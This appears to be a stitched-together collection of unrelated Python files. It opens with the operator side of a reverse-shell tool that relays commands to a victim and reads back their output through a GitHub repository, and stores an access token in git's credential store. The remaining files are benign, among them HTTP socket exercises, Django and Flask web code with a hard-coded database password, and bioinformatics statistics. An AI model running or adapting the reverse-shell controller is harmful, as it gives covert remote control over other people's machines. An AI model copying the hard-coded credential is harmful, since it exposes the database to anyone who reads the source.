    # One-time credential setup; fails harmlessly if already authenticated.
    try:
        setupAuthentication()
        print "Have set your GitHub authentication token for you!"
    except:
        print "User was already authenticated to GitHub"
    while True:
        # git pull - check for changes
        #print "git pull - synching remote to local"
        #localrepo.remotes.origin.pull()
        gitPull(localrepo)
        # check if outfile has changed
        #if(outhash != hashlib.md5(open(outfile, 'rb').read()).hexdigest()):
        # display updated output and update outhash
        displayOutput(outfile)
        outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
        # prompt user for input, this blocks the loop on this side until attacker issues command
        cmd = raw_input("# ")
        if(cmd != ''):
            # save cmd into "in.txt"
            setIn(infile, cmd)
            # git commit - commit changes to "in.txt" in local repo
            gitCommit(localrepo, infile)
            # git push - push to remote
            gitPush(localrepo)
            time.sleep(5)
            # wait for victim to commit response.
            getResponse()
        else:
            # no command entered: idle briefly before polling again
            print "Waiting 5 seconds"
            time.sleep(5)
def getResponse():
    """Poll `git fetch` until the victim pushes new commits (any fetch
    output means the remote gained new objects)."""
    #print "== getResponse "
    count = 0
    while True:
        count = count+1
        print "checking remote repo for updates loop #" + str(count)
        status, output = commands.getstatusoutput("git fetch")
        #print output
        if(len(output) != 0):
            print "Victim updated repo!"
            return # exit getResponse
# This executes a "push" request to trigger a github authentication prompt.
# It then enters the credentials for you.
# Token authentcation works with the token as the username and a blank password.
def setupAuthentication():
# We need to setup authentication for github.
# This one tells git to save credentials
os.system("git config credential.helper store")
print "credential.helper store executed"
child = pexpect.spawn('git push origin master')
child.expect("Username*", timeout=2)
child.sendline(args.token)
child.expect("Password*", timeout=2)
child.sendline("")
child.expect(pexpect.EOF)
# git push - pushes local changes up to remote
def gitPush(localrepo):
    """Push the local master branch to origin (output discarded)."""
    #print "== gitPush"
    #localrepo.remotes.origin.push()
    #os.system("git push origin master")
    proc = Popen(['git', 'push', 'origin','master'], stdout=PIPE, stderr=STDOUT)
    # NOTE(review): the push is issued twice (Popen above and
    # getstatusoutput below) — confirm whether both are intentional.
    status, output = commands.getstatusoutput("git push origin master")
# git commit - commits the latest "in.txt" locally
def gitCommit(localrepo, infile):
    """Stage in.txt and commit it with a fixed 'attacker' message."""
    #print "== gitCommit"
    #os.system("git add in.txt")
    status, output = commands.getstatusoutput("git add in.txt")
    #print output
    status, output = commands.getstatusoutput("git commit -m 'attacker'")
    #print output
    #proc = Popen('cd ' + args.path + '/ && git add in.txt', stdout=PIPE, stderr=STDOUT)
    #proc = Popen('cd ' + args.path + '/ && git commit -m \'attacker\'', stdout=PIPE, stderr=STDOUT)
    #os.system("git commit -m 'attacker'")
def gitPull(localrepo):
    """Sync the local checkout with the remote via `git pull`."""
    #proc = Popen(['git', 'pull'], stdout=PIPE, stderr=STDOUT)
    # print "== gitPull"
    status, output = commands.getstatusoutput("git pull")
    # print output
# display the contents of "out.txt"
# this may have crypto to deal with soon.
def displayOutput(outfile):
    """Print the victim's command output stored in out.txt."""
    #print "== displayOutput"
    with open(outfile) as f:
        print f.read()
# save the attacker's command into "in.txt"
# this may have crypto to deal with soon.
def setIn(infile, cmd):
    """Write the attacker's command string into the shared input file."""
    # "with" guarantees the handle closes even if write() raises,
    # unlike the previous open()/write()/close() sequence.
    with open(infile, 'w') as f:
        f.write(cmd)
################################################################################
################################################################################
def usage():
    """Return the example-usage epilog shown in the --help output."""
    example = " -u https://github.com/username/repo -p /tmp/gitshell -t 11111111111111111111111111"
    return "== Example Usage ==\n\n" + sys.argv[0] + example
# Defining the arguments and parsing the args.
parser = argparse.ArgumentParser(
    description='Using a GitHub repository to deliver a reverse shell',
    epilog=usage(),
    formatter_class=argparse.RawDescriptionHelpFormatter)
# Drop the default "optional arguments" group so all flags are listed
# under one "required arguments" group in --help.
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
required.add_argument("-u", "--url", type=str, help="URL to github repo you will communicate through", required=True)
required.add_argument("-p", "--path",type=str, help="Local path to clone repo to", required=True)
required.add_argument("-t", "--token",type=str, help="GitHub authentication token", required=True)
try:
    args = parser.parse_args()
except:
    # argparse raises SystemExit on bad/missing args; exit quietly.
    #print sys.exc_info()
    #parser.print_help()
    sys.exit(0)
main()
|
import os
# Demonstrates basic os-module file/directory operations.
#os.rename("a.txt", "b.txt")
#os.remove("b.txt")
# List the contents of ./anli (raises FileNotFoundError if absent).
res = os.listdir("./anli")
print(res)
print(os.path.isdir("./anli/game"))
#os.mkdir("./anli/dirtest")
#os.rmdir("./anli/dirtest")
# Show the current working directory.
print(os.getcwd())
|
# NOTE(review): distutils.core.setup ignores install_requires (and
# distutils is removed in Python 3.12) — consider switching to
# setuptools.setup, which accepts the same keywords.
from distutils.core import setup
setup(
    name='plugwise',
    packages=['plugwise'],
    version='0.2',
    license='MIT',
    description='A library for communicating with Plugwise smartplugs',
    author='Sven Petai',
    author_email='hadara@bsd.ee',
    url='https://bitbucket.org/hadara/python-plugwise/wiki/Home',
    download_url='https://github.com/cyberjunky/plugwise/archive/0.2.tar.gz',
    # Runtime dependencies: CRC computation and serial-port access.
    install_requires=[
        'crcmod',
        'pyserial',
    ],
    scripts=['plugwise_util'],
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
    ],
)
|
#!/usr/bin/env python3
"""
Author: Francis C. Dailig
Project Name: Project 1
Description: Code for Project 1. Three test cases: 1 - Small HTTP object; 2 - Large HTTP object; 3 - Simple HTTP Server
"""
import argparse
import socket
def testCase1():
    """
    This function will run the first test case for project 1
    It will request a small http object from gaia.cs.umass.edu
    Source used: https://stackoverflow.com/questions/49848375/how-to-use-python-socket-to-get-a-html-page
    """
    #Create socket and connect to webserver
    host = "gaia.cs.umass.edu" #human readable address of the webserver
    port = 80 #port of the webserver
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create TCP Socket
    s.connect((host,port)) #connect to the Webserver
    #Send Request for http object
    request = "GET /wireshark-labs/INTRO-wireshark-file1.html HTTP/1.1\r\nHost:gaia.cs.umass.edu\r\n\r\n"
    s.send(request.encode())
    #Get Response - a single recv suffices for this small object
    response = s.recv(1024)
    http_response = repr(response)  # NOTE(review): unused — kept as-is
    #close socket
    s.close()
    #Print Response
    print('Request: {}'.format(request))
    print('[RECV] - {}\n'.format(len(response)))
    print(response.decode())
def testCase2():
    """
    This function will run test case 2 of project 1
    This will request a large html object
    Source use: https://steelkiwi.com/blog/working-tcp-sockets/
    """
    #Create socket and connect to webserver
    host = "gaia.cs.umass.edu" #human readable address of the webserver
    port = 80 #port of the webserver
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create TCP Socket
    s.connect((host,port)) #connect to the Webserver
    #Send Request to web server
    request = "GET /wireshark-labs/HTTP-wireshark-file3.html HTTP/1.1\r\nHost:gaia.cs.umass.edu\r\n\r\n"
    s.send(request.encode())
    # Accumulate chunks until recv returns b'' (server closed connection).
    chunk = s.recv(1024)
    response = chunk
    while True:
        chunk = s.recv(1024)
        response += chunk
        if not chunk:
            break
    print('Request: {}'.format(request))
    print('[RECV] - {}'.format(len(response)))
    print(response.decode())
    s.close()
def testCase3():
    """
    This function will run test case 3 of project 1
    This will create simple http server on port 31337
    Source used: https://stackoverflow.com/questions/39535855/send-receive-data-over-a-socket-python3
    """
    server_addr = ('0.0.0.0',31337) #server will listen on port 31337
    # Canned HTTP response: status line, headers, then the body.
    data = "HTTP/1.1 200 OK\r\n"\
        "Content-Type: text/html; charset=UTF-8\r\n\r\n"\
        "<html>Congratulations! You've downloaded the first Wireshark lab file!</html>\r\n"
    #Create a socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #Bind address
    sock.bind(server_addr)
    #Listen for incoming connections (backlog of 5)
    sock.listen(5)
    print("Webserver is listening. Browse to: http://127.0.0.1:31337")
    while True:
        c, addr = sock.accept()
        received = c.recv(1024)
        print("Received: {}".format(received))
        print("sending >>>>>>>>>>>>>>>>>>>>")
        print(data)
        print("<<<<<<<<<<<<<<<<<<<<")
        c.send(bytes(data, 'utf8'))
        c.close()
        # Serve exactly one request, then shut down.
        break
def main():
    """Parse the -case argument and dispatch to the matching test case."""
    parser = argparse.ArgumentParser(
        usage='python3 http.py -case {1, 2, 3}',
        formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(
        '-case', required=True, choices=range(1, 4), type=int,
        help="test case number:\n1 - small http file\n2 - large http file\n3 - http server\n")
    args = parser.parse_args()
    # Dispatch table replaces the if/elif chain; choices=1..3 guarantees
    # the key exists. Banner strings are reproduced exactly as before.
    cases = {
        1: ("Running test Case 1 - Small HTTP Request", testCase1),
        2: ("Running test case 2 - Large HTTP Request.", testCase2),
        3: ("Runnning test case 3 - Simple HTTP Server.", testCase3),
    }
    banner, runner = cases[args.case]
    print(banner)
    runner()

if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 10 23:37:09 2018
@author: zeeshan haider
"""
from IPython import get_ipython
get_ipython().magic('reset -sf')
import pyaudio
import wave
import os
import librosa
import numpy as np
import cPickle
path="E:\\All Data\\study\\MS\\2\\machine learning\\Project\\background_dataset"
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 22050
RECORD_SECONDS =1
load_training = open("E:\\All Data\study\\MS\\2\\machine learning\\Project\\save_training_1.pickle",'rb')
clf = cPickle.load(load_training) # LOAD TRAINED CLASSIFIER
load_training.close()
for i in range(8000):
WAVE_OUTPUT_FILENAME = "background"+".wav"
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(path+"\\"+WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
y, sr = librosa.load(path+"\\"+WAVE_OUTPUT_FILENAME,duration=1)
S = librosa.feature.mfcc(y=y, sr=sr, hop_length=512, n_mfcc=20)
S=np.reshape(S,np.product(S.shape))
S=np.concatenate((S,S[840:860]))
print clf.predict([S]) |
"""
Python code snippets vol 38:
188-Calculate percentage
stevepython.wordpress.com
requirements: None
source:
https://docs.python.org/3/library/string.html#module-string
"""
points = 10
total = 300
print('Percentage of points from total is: {:.2%}'.format(points/total))
#Output:
#>>>Percentage of points from total is: 3.33%
|
#!/usr/bin/python
import pandas as pd
from ete2 import Tree
import numpy as np
def Make_VJ_Matrix():
    """Return a zero-filled pandas DataFrame indexed by V gene names (rows)
    and J gene names (columns), used as a template for per-VJ-pair metrics.

    Access pattern: matrix_name['J_name'].loc['V_name'].
    """
    #format for calling location matrix_name['J_name'].loc['V_name']
    # Fixed catalogue of V segment names (IGH V genes and pseudogenes).
    V_names = ['IGHV1-12', 'IGHV4-4', 'IGHV1-17', 'IGHV1-14', 'IGHV3-15', 'IGHV1-18', 'IGHV3-11', 'IGHV3-13', 'IGHV(III)-16-1', \
    'IGHV3-33-2', 'IGHV4-30-4%31', 'IGHV3-19', 'IGHV(II)-33-1', 'IGHV3-7', 'IGHV3-6', 'IGHV3-30-2', 'IGHV(III)-5-2', \
    'IGHV(II)-30-1', 'IGHV4-59%61', 'IGHV(III)-25-1', 'IGHV(IV)-44-1', 'IGHV(II)-65-1', 'IGHV1-24', 'IGHV3-16', 'IGHV(III)-2-1', \
    'IGHV1-NL1', 'IGHV2-70', 'IGHV4-30-2', 'IGHV3-63', 'IGHV3-64', 'IGHV3-65', 'IGHV4-80', 'IGHV7-4-1', 'IGHV(III)-47-1', \
    'IGHV5-78', 'IGHV3-d', 'IGHV(II)-74-1', 'IGHV3-h', 'IGHV(III)-11-1', 'IGHV3-79', 'IGHV3-73', 'IGHV3-72', 'IGHV3-71', \
    'IGHV3-76', 'IGHV3-75', 'IGHV3-74', 'IGHV(III)-82', 'IGHV1-8', 'IGHV7-34-1%40%NL1.rn', 'IGHV1-3', 'IGHV1-2', 'IGHV4-39', \
    'IGHV4-34', 'IGHV7-81', 'IGHV(II)-62-1', 'IGHV(II)-51-2', 'IGHV3-48', 'IGHV3-49', 'IGHV3-47', 'IGHV3-42', 'IGHV(II)-22-1', \
    'IGHV3-41', 'IGHV3-60%62', 'IGHV7-27', 'IGHV3-9', 'IGHV(II)-44-2', 'IGHV1-f', 'IGHV(III)-38-1', 'IGHV1-c', 'IGHV6-1', \
    'IGHV3-52', 'IGHV3-54', 'IGHV3-57', 'IGHV(III)-67-4', 'IGHV(III)-67-3', 'IGHV(II)-31-1', 'IGHV2-5', 'IGHV4-55', 'IGHV3-43', \
    'IGHV(II)-53-1', 'IGHV1-45', 'IGHV1-46', 'IGHV3-25', 'IGHV3-20', 'IGHV3-21', 'IGHV3-22', 'IGHV3-23', 'IGHV3-29', 'IGHV(III)-51-1', \
    'IGHV(II)-78-1', 'IGHV1-58', 'IGHV5-a', 'IGHV5-51', 'IGHV(II)-15-1', 'IGHV3-37', 'IGHV3-36', 'IGHV3-35', 'IGHV3-32', 'IGHV2-26', \
    'IGHV3-38', 'IGHV(III)-13-1', 'IGHV1-67', 'IGHV(III)-44', 'IGHV1-68', 'IGHV1-69', 'IGHV(II)-28-1', 'IGHV(II)-60-1', 'IGHV(II)-49-1', \
    'IGHV(III)-26-1', 'IGHV7-56', 'IGHV4-28', 'IGHV3-53%66', 'IGHV(II)-20-1', 'IGHV2-10', 'IGHV3-30%33rn', 'IGHV4-b', 'IGHV(III)-76-1', \
    'mIGHV6-3%6', 'IGHV3-NL1', 'mIGHV7-3']
    # Fixed catalogue of J segment names (IGH/IGK/IGL and TR J genes).
    J_names = ['TRAJ57', 'TRBJ2-4', 'TRBJ2-5', 'TRBJ2-6', 'TRBJ2-7', 'TRBJ2-1', 'TRBJ2-2', 'IGHJ1P', 'TRAJ30', 'TRAJ31', 'TRAJ32', 'TRAJ33', \
    'TRAJ34', 'TRAJ35', 'TRAJ36', 'TRAJ37', 'TRAJ38', 'TRAJ39', 'TRBJ2-2P', 'IGKJ1', 'IGKJ2', 'IGKJ3', 'IGKJ4', 'IGKJ5', 'TRBJ1-6', \
    'TRBJ1-5', 'TRBJ1-4', 'TRBJ1-3', 'TRBJ1-2', 'TRBJ1-1', 'TRAJ29', 'TRAJ28', 'TRAJ27', 'TRAJ26', 'TRAJ25', 'TRAJ24', 'TRAJ23', 'TRAJ22', \
    'TRAJ21', 'TRAJ20', 'mIGKJ4', 'mIGKJ5', 'mIGKJ1', 'mIGKJ2', 'mIGKJ3', 'mIGLJ3P', 'TRBJ2-3', 'TRAJ58', 'TRAJ59', 'TRAJ52', 'TRAJ53', \
    'TRAJ50', 'TRAJ51', 'TRAJ56', 'IGLJ2/3', 'TRAJ54', 'TRAJ55', 'TRGJP', 'TRDJ4', 'TRDJ1', 'TRDJ3', 'TRDJ2', 'TRAJ49', 'TRAJ48', 'TRAJ41', \
    'TRAJ40', 'TRAJ43', 'TRAJ42', 'TRAJ45', 'TRAJ44', 'TRAJ47', 'TRAJ46', 'IGLJ1', 'IGLJ7', 'IGLJ6', 'IGLJ5', 'IGLJ4', 'mIGHJ3', 'mIGHJ2',\
    'mIGHJ1', 'mIGHJ4', 'IGHJ2P', 'TRGJ1', 'TRGJ2', 'IGHJ6', 'IGHJ5', 'IGHJ4', 'IGHJ3', 'IGHJ2', 'IGHJ1', 'TRAJ4', 'TRAJ5', 'TRAJ6', 'TRAJ7', \
    'TRAJ1', 'TRAJ2', 'TRAJ3', 'TRAJ8', 'TRAJ9', 'TRAJ61', 'TRAJ60', 'mIGLJ4', 'mIGLJ3', 'mIGLJ2', 'mIGLJ1', 'TRAJ16', 'TRAJ17', 'TRAJ14',\
    'TRAJ15', 'TRAJ12', 'TRAJ13', 'TRAJ10', 'TRAJ11', 'TRAJ18', 'TRAJ19', 'IGHJ3P', 'TRGJP2', 'TRGJP1']
    return pd.DataFrame(np.zeros((len(V_names),len(J_names))),index=V_names,columns=J_names)
def calculate_tree_size(rep_obj, pruned=False):
    """Number of descendant nodes per VJ lineage tree as a nested dict [J][V].

    Args:
        rep_obj: repertoire object exposing ``tree_dict`` and
            ``pruned_tree_dict`` mappings of 'V_J' keys to tree objects.
        pruned: when truthy, measure the pruned trees instead.

    The original used two separate ``if pruned==False/True`` tests, which
    left ``dictionary`` unbound (NameError) for any other truthy value; a
    single conditional expression removes that hazard.
    """
    dictionary = rep_obj.pruned_tree_dict if pruned else rep_obj.tree_dict
    tree_size_DF = Make_VJ_Matrix()
    for vj_pair in dictionary:
        parts = vj_pair.split('_')
        V, J = parts[0], parts[1]
        tree_size_DF[J].loc[V] = len(dictionary[vj_pair].get_descendants())
    return tree_size_DF.to_dict()
def calculate_cdr_lengths(obj_dict, cdr='cdr3'):
    """Histogram of CDR sequence lengths across clones.

    Args:
        obj_dict: mapping of identifier -> clone object; the clone exposes
            the requested CDR sequence as an attribute.
        cdr: name of the CDR attribute to measure (default ``'cdr3'``).
            The original accepted this parameter but always read ``cdr3``;
            it is now honoured (default behaviour unchanged).

    Returns:
        dict mapping length (int) -> number of clones with that length.
    """
    len_dict = {}
    for key in obj_dict:
        # str() tolerates non-string sequence representations, as before.
        cdr_len = len(str(getattr(obj_dict[key], cdr)))
        len_dict[cdr_len] = len_dict.get(cdr_len, 0) + 1
    return len_dict
def avg_node_mutation_length(tree_dict):
    """For each lineage tree, report [mean, std] of per-node mutation counts.

    Args:
        tree_dict: mapping of key -> tree; each descendant node exposes a
            ``mutations`` sequence.
    """
    tree_mutation_dict = {}
    for key, tree in tree_dict.items():
        counts = [len(node.mutations) for node in tree.iter_descendants()]
        tree_mutation_dict[key] = [np.mean(counts), np.std(counts)]
    return tree_mutation_dict
def generations(tree_dict):
    """Map each key to the distance of the farthest node from its tree root.

    ``get_farthest_node()`` returns a (node, distance) pair; only the
    distance is kept.
    """
    return {key: tree.get_farthest_node()[1] for key, tree in tree_dict.items()}
def calculate_vj_shm(vj_clones):
    """Mean and standard deviation of somatic hypermutation per VJ pair.

    Args:
        vj_clones: mapping of VJ key -> {clone id -> clone}; each clone
            exposes an ``sh`` value.

    Returns:
        (means, stdevs): two dicts keyed by VJ pair.
    """
    sh_means = {}
    sh_stdevs = {}
    for vj, clones in vj_clones.items():
        sh_values = np.array([clones[name].sh for name in clones])
        sh_means[vj] = sh_values.mean()
        sh_stdevs[vj] = sh_values.std()
    return sh_means, sh_stdevs
def leafiness_matrix(tree_dict):
    """Leaf fraction (leaves / total descendants) per VJ pair, arranged in
    the standard V-by-J matrix and returned as a nested dict [J][V].

    ``len(tree)`` is the tree's leaf count; ``get_descendants()`` yields
    every node below the root.
    """
    matrix = Make_VJ_Matrix()
    for vj_pair, tree in tree_dict.items():
        parts = vj_pair.split('_')
        matrix[parts[1]].loc[parts[0]] = float(len(tree)) / len(tree.get_descendants())
    return matrix.to_dict()
def leafiness_global(tree_dict):
    """Summary statistics of leaf fraction across all trees.

    Returns a dict with 'max', 'avg', 'std' and the raw 'list' of ratios
    (one per tree, in dict iteration order).
    """
    ratios = [float(len(t)) / float(len(t.get_descendants())) for t in tree_dict.values()]
    return {'max': max(ratios), 'avg': np.average(ratios), 'std': np.std(ratios), 'list': ratios}
def generations_matrix(generations_dict):
    """Arrange per-VJ generation depths into the V-by-J matrix, returned as
    a nested dict [J][V]."""
    matrix = Make_VJ_Matrix()
    for vj_pair, depth in generations_dict.items():
        parts = vj_pair.split('_')
        matrix[parts[1]].loc[parts[0]] = depth
    return matrix.to_dict()
def generations_global(generations_dict):
    """Summary statistics (max/avg/std plus the raw list) of generation depth
    across all VJ pairs."""
    depths = list(generations_dict.values())
    return {'max': max(depths), 'avg': np.average(depths), 'std': np.std(depths), 'list': depths}
def diversity_matrix(tree_size_dict, vj_freqs_dict):
    """Tree size normalised by raw VJ read frequency, per VJ pair, arranged
    in the V-by-J matrix and returned as a nested dict [J][V].

    Args:
        tree_size_dict: nested dict [J][V] of tree sizes (e.g. from
            calculate_tree_size).
        vj_freqs_dict: mapping of 'V_J' key -> read frequency.
    """
    matrix = Make_VJ_Matrix()
    size_df = pd.DataFrame(tree_size_dict)
    for vj_pair, freq in vj_freqs_dict.items():
        parts = vj_pair.split('_')
        matrix[parts[1]].loc[parts[0]] = float(size_df[parts[1]].loc[parts[0]]) / freq
    return matrix.to_dict()
def diversity_global(tree_size_dict, vj_freqs_dict):
    """Summary statistics of tree size / read frequency across VJ pairs.

    Returns a dict with 'max', 'avg', 'std' and the raw 'list' of ratios
    in the iteration order of ``vj_freqs_dict``.
    """
    size_df = pd.DataFrame(tree_size_dict)
    ratios = []
    for vj_pair in vj_freqs_dict:
        parts = vj_pair.split('_')
        ratios.append(float(size_df[parts[1]].loc[parts[0]]) / vj_freqs_dict[vj_pair])
    return {'max': max(ratios), 'avg': np.average(ratios), 'std': np.std(ratios), 'list': ratios}
def d50(clones, num_Reads):
    """D50 diversity index: the clone key at which cumulative reads first
    reach half of ``num_Reads``, normalised by the number of clones.

    Assumes clone keys are numeric ranks (they are divided by the clone
    count); returns None when the half-way point is never reached.
    """
    half = num_Reads / 2
    cumulative = 0
    for clone_id in clones:
        cumulative += clones[clone_id].num_reads
        if cumulative >= half:
            return clone_id / float(len(clones))
def CDR3_global(clone_CDR3_lengths):
    """Summary statistics of CDR3 length across all clones.

    Args:
        clone_CDR3_lengths: histogram mapping length -> clone count
            (e.g. from calculate_cdr_lengths).

    The original built the expanded per-clone length list and then fell off
    the end, returning None; it now returns the same summary dict shape as
    the other *_global helpers in this module.
    """
    ls = []
    for length in clone_CDR3_lengths:
        # Repeat each length once per clone so avg/std weight by clone count.
        ls.extend([np.float64(length)] * clone_CDR3_lengths[length])
    return {'max': max(ls), 'avg': np.average(ls), 'std': np.std(ls), 'list': ls}
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render
from rest_framework.parsers import JSONParser
from rest_framework.renderers import JSONRenderer
from apiREST.models import *
from apiREST.serializers import *
# Create your views here.
#-------------------------------UTILS-------------------------------
class JSONResponse(HttpResponse):
    """HttpResponse whose body is the JSON rendering of ``data`` and whose
    content type is fixed to UTF-8 JSON."""
    def __init__(self, data, **kwargs):
        kwargs['content_type'] = 'application/json; charset=utf-8'
        rendered = JSONRenderer().render(data)
        super(JSONResponse, self).__init__(rendered, **kwargs)
def consoleLog(text='Información', data=''):
    """Print a highlighted debug line in the original '#####' framed format."""
    print('########## {} : {} ##########'.format(text, data))
@csrf_exempt
def scenarios(request):
    """Return every Stage, ordered by its ``order`` field, as a JSON list of
    their ``as_dict()`` representations."""
    ordered_stages = Stage.objects.all().order_by('order')
    return JSONResponse([stage.as_dict() for stage in ordered_stages])
@csrf_exempt
def characters(request):
    """Return every Character as a JSON list of ``as_dict()`` representations."""
    all_characters = Character.objects.all()
    return JSONResponse([character.as_dict() for character in all_characters])
#-------------------------------PLAYER-------------------------------
@csrf_exempt
def player_list(request):
    """
    List the top players by score (GET) or create a new player (POST).

    GET: optional ``rows`` query parameter (default 10) limits how many
    players are returned, highest score first.
    POST: expects a JSON body matching PlayerSerializer; returns 201 with
    the submitted payload on success, 400 with validation errors otherwise.
    Any other method receives an empty 405 response.
    """
    rows = request.GET.get('rows', 10)
    if request.method == 'GET':
        top_players = Player.objects.all().order_by('-score')[0:int(rows)]
        return JSONResponse([player.as_dict() for player in top_players])
    elif request.method == 'POST':
        data = JSONParser().parse(request)
        serializer = PlayerSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
            # NOTE(review): the original also fetched an unrelated
            # JobRequest(pk=<new id>) and discarded it; that query could
            # raise DoesNotExist, so it was removed.
            return JSONResponse(data, status=201)
        print(serializer.errors)
        return JSONResponse(serializer.errors, status=400)
    else:
        # The original returned HttpResponse(405): a 200 response whose BODY
        # was "405". Method-not-allowed must be the status code.
        return HttpResponse(status=405)
|
import itertools
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.core.validators import URLValidator
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from mptt.models import MPTTModel, TreeForeignKey
from .managers import ItemManager
class ItemBase(MPTTModel):
    """
    Model managing the items without tree inheritance and providing the basic fields and behaviours.
    For the hierarchy of items, the class is using the 'mptt' module, see https://django-mptt.github.io/django-mptt/
    Each item has a url associated that generates a href at save. This behaviour is used to optimize the processing
    required in case the field uses complex value like django url pattern.
    """
    # Tree position; mptt maintains the hierarchy through this FK.
    parent = TreeForeignKey(
        blank=True,
        db_index=True,
        null=True,
        related_name='children',
        to='self')
    name = models.CharField(
        _('Name'), max_length=255)
    slug = models.SlugField(unique=True, verbose_name=_(u'Slug'), max_length=150)
    # Raw target: may be an absolute URL, a django URL pattern name, or a
    # relative path; resolved into ``href`` at save time.
    url = models.CharField(
        _('Url'), blank=True, null=True, max_length=255)
    # Optional generic relation: when ``url`` is empty, href falls back to
    # the related object's get_absolute_url().
    content_type = models.ForeignKey(ContentType, null=True, blank=True)
    object_id = models.PositiveIntegerField(null=True, blank=True)
    content_object = GenericForeignKey('content_type', 'object_id')
    # Precomputed link, refreshed by save().
    href = models.CharField(
        _('Link'), blank=True, null=True, max_length=255)
    access_loggedin = models.BooleanField(
        _('Logged in only'),
        help_text=_('Check it to grant access to this item to authenticated users only.'),
        db_index=True, default=False)
    access_group = models.ManyToManyField(
        Group, verbose_name=_('User must belong to one of these groups'), blank=True)
    access_permissions = models.ManyToManyField(
        Permission, verbose_name=_('User must have one of these permissions'), blank=True)
    css_class = models.CharField(
        _('Css class'), blank=True, null=True, max_length=100, help_text=_('Specify a css class.'))
    is_new_tab = models.BooleanField(
        _('New tab'), db_index=True, default=False,
        help_text=_('The link should open in a new tab.'))
    objects = ItemManager()

    class Meta:
        abstract = True
        verbose_name = _(u"navigation item")
        verbose_name_plural = _(u"navigation items")

    def __unicode__(self):
        return self.name

    def __str__(self):
        return self.__unicode__()

    def url_is_valid(self):
        """
        Checks if the 'url' property of the object is a valid url.
        :returns: bool -- the url is valid or not.
        """
        if self.url:
            val = URLValidator()
            try:
                val(self.url)
                return True
            except ValidationError:
                pass
        return False

    def url_is_pattern(self):
        """
        Checks if the 'url' property of the object is a django url pattern.
        :returns: bool -- the url is a django url pattern or not.
        """
        if self.url:
            try:
                reverse(self.url)
                return True
            # The original used a bare ``except:`` which also swallowed
            # SystemExit/KeyboardInterrupt; narrowed to Exception.
            except Exception:
                pass
        return False

    def generate_unique_slug(self):
        """
        Ensures uniqueness of slug, inspired from
        https://keyerror.com/blog/automatically-generating-unique-slugs-in-django
        """
        unique_slug = orig = slugify(self.__str__())
        for x in itertools.count(1):
            if not self.__class__.objects.filter(slug=unique_slug).exists():
                break
            unique_slug = '%s-%d' % (orig, x)
        return unique_slug

    def save(self, *args, **kwargs):
        """
        Overrides the parent class, mostly to generate and store the href field from the url field and
        generates a slug if empty.
        """
        self.href = ''
        if self.url:
            # First try to see if the link is a url
            if self.url_is_valid():
                self.href = self.url
            # Otherwise check if the url is a django pattern
            elif self.url_is_pattern():
                self.href = reverse(self.url)
            # Finally store the value if the url field looks like a relative url
            elif self.url.startswith('/'):
                self.href = self.url
        elif self.content_object:
            self.href = self.content_object.get_absolute_url()
        # store the base field
        if not self.slug:
            self.slug = self.generate_unique_slug()
        super(ItemBase, self).save(*args, **kwargs)
class Item(ItemBase):
    """
    Concrete navigation item. Inherits all fields and behaviour unaltered
    from ItemBase (which is abstract, see its Meta).
    """
|
# Generated by Django 2.0.6 on 2018-07-01 21:41
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: makes Project.authors an optional (blank=True)
    # many-to-many to solution.Profile with reverse name 'projects'.
    # Do not hand-edit applied migrations; add a new migration instead.
    dependencies = [
        ('solution', '0022_auto_20180701_1709'),
    ]
    operations = [
        migrations.AlterField(
            model_name='project',
            name='authors',
            field=models.ManyToManyField(blank=True, related_name='projects', to='solution.Profile'),
        ),
    ]
|
# NOTE(review): ``json`` imported from flask below is immediately shadowed by
# the stdlib ``import json`` two lines later; only stdlib json is ever used.
from flask import Flask, json, Response, redirect
from flask_cors import CORS
import os
import random
import json
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# allows redirects
CORS(app)
# SECURITY(review): database credentials are hard-coded in source; rotate the
# password and load the URI from the environment (e.g. DATABASE_URL).
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:G8AR7Cseu5bTh9pPttcX@localhost/flowgames'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
# databse model
class Flow_Games(db.Model):
    """ORM row for the ``games`` table: an integer primary key plus a JSON
    game board."""
    __tablename__ = 'games'
    id = db.Column(db.Integer, primary_key=True, unique=True)
    game_board = db.Column(db.JSON)

    def __repr__(self):
        return '<Board: {} {}>'.format(self.id, self.game_board)
@app.route('/')
def index():
    # Landing page: static greeting.
    return '<h1>Hello World!</h1>'
@app.route('/users/<name>')
def user(name):
    """Greet ``name`` back in an h1 heading."""
    return f'<h1>Hello, {name}!</h1>'
@app.route('/play')
def choose_game():
    """Redirect to a randomly chosen game board (ids 1 through 5)."""
    board_id = random.randint(1, 5)
    return redirect(f'/game/{board_id}')
@app.route('/game/<num>')
def game(num):
    """Serve the stored JSON board for game ``num``.

    NOTE(review): an unknown id makes ``.first()`` return None, so the
    attribute access raises AttributeError — consider returning a 404.
    """
